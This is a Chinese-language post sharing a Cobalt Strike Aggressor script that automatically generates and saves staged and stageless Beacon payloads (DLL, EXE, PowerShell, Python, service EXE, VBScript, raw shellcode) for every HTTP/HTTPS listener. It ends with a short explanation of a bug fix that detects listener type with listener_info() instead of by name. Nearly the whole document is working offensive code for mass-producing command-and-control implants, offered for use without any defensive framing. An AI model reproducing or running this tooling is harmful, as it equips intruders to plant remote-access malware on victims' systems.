ArtifactPayloadGenerator.cna脚本bug修复
#Automatic Artifact Payload Generator#Author: @r3dQu1nn#更新:修复如果监听器名字没有http或https会生成失败的bug顺便汉化了一下 --by:WBG#Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener#Custom Directory for Payloadsmkdir("/opt/cobaltstrike/Staged_Payloads");mkdir("/opt/cobaltstrike/Stageless_Payloads");menubar("生成Payload", "payloadgenerator", 2);popup payloadgenerator {item "&有效载荷生成器" {prompt_confirm("你想生成不同类型的Payload吗?", "Payload Generator Confirmation", {show_message("正在生成Payload...");payloadgenerate();});}}sub payloadgenerate {foreach $name (listeners_local()) {$original_listener = $name;$listener_name = listener_info($name);if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {#Staged Payloads$data = artifact($original_listener, "dll");$data1 = artifact($original_listener, "dllx64");$data2 = artifact($original_listener, "exe");$data3 = artifact($original_listener, "powershell");$data4 = artifact($original_listener, "python");$data5 = artifact($original_listener, "svcexe");$data6 = artifact($original_listener, "vbscript");#Write and Save Payloads$handle = openf(">/opt/cobaltstrike/Staged_Payloads/dllpayload.dll");writeb($handle, $data);closef($handle);$handle1 = openf(">/opt/cobaltstrike/Staged_Payloads/dllx64payload.dll");writeb($handle1, $data1);closef($handle1);$handle2 = openf(">/opt/cobaltstrike/Staged_Payloads/exepayload.exe");writeb($handle2, $data2);closef($handle2);$handle3 = openf(">/opt/cobaltstrike/Staged_Payloads/powershellpayload.ps1");writeb($handle3, $data3);closef($handle3);$handle4 = openf(">/opt/cobaltstrike/Staged_Payloads/pythonpayload.py");writeb($handle4, $data4);closef($handle4);$handle5 = openf(">/opt/cobaltstrike/Staged_Payloads/svcexepayload.exe");writeb($handle5, $data5);closef($handle5);$handle6 = openf(">/opt/cobaltstrike/Staged_Payloads/vbspayload.vbs");writeb($handle6, $data6);closef($handle6);#Stageless Payloadsartifact_stageless($original_listener, "dll", "x86", "", &dll);artifact_stageless($original_listener, "dllx64", "x86", "", &dllx64);artifact_stageless($original_listener, "exe", "x86", "", &exe);artifact_stageless($original_listener, "powershell", "x86", "", &ps1);artifact_stageless($original_listener, "raw", "x86", "", &raw);artifact_stageless($original_listener, "svcexe", "x86", "", &svcexe);}else{show_message("没有找到http或https监听器");}}}sub dll {#Write and Save Payloadlocal('$cradle');$cradle = openf(">/opt/cobaltstrike/Stageless_Payloads/dllpayload.dll");writeb($cradle, $1);closef($cradle);}sub dllx64 {#Write and Save Payloadlocal('$cradle1');$cradle1 = openf(">/opt/cobaltstrike/Stageless_Payloads/dllx64payload.dll");writeb($cradle1, $1);closef($cradle1);}sub exe {#Write and Save Payloadlocal('$cradle2');$cradle2 = openf(">/opt/cobaltstrike/Stageless_Payloads/exepayload.exe");writeb($cradle2, $1);closef($cradle2);}sub ps1 {#Write and Save Payloadlocal('$cradle3');$cradle3 = openf(">/opt/cobaltstrike/Stageless_Payloads/powershellpayload.ps1");writeb($cradle3, $1);closef($cradle3);}sub raw {#Write and Save Payloadlocal('$cradle4');$cradle4 = openf(">/opt/cobaltstrike/Stageless_Payloads/rawpayload.bin");writeb($cradle4, $1);closef($cradle4);}sub svcexe {#Write and Save Payloadlocal('$cradle5');$cradle5 = openf(">/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe");writeb($cradle5, $1);closef($cradle5);if (-exists "/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe") {show_message("已生成并保存所有分阶段和无阶段有效负载。");show_message("保存在 /opt/cobaltstrike/Staged_Payloads/ \n /opt/cobaltstrike/Stageless_Payloads/ ");}}
源脚本
$listener_name = lc($name);
修改为
$listener_name = listener_info($name);
这里的bug是如果新建的监听器名字不含有http或https就会创建失败因为原先是靠监听器名字判断是否有http或https类型的监听器而修改后则是直接获取了监听器的类型不在靠用户命名这种不准确的东西了
最近更新 1 year ago